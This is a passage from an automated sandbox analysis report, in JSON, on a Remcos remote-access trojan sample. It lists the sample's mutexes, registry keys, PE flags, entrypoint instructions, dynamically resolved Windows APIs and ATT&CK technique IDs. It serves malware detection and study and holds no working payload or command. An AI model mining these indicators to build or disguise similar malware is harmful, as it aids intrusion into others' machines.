"\"\\Sessions\\1\\BaseNamedObjects\\Rmc-4QDXC3\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Rmc-4QDXC3\"\n \"Local\\ZonesCacheCounterMutex\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"remcos.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"remcos.exe.bin\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetProcessDpiAwareness (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter NtUnmapViewOfSection (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter IsUserAnAdmin (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetProcessDEPPolicy (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter NtSuspendProcess (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter NtResumeProcess (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetExtendedTcpTable (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetFinalPathNameByHandleW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RmStartSession (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002984)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00001348)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005076)\n \"remcos.exe\" called 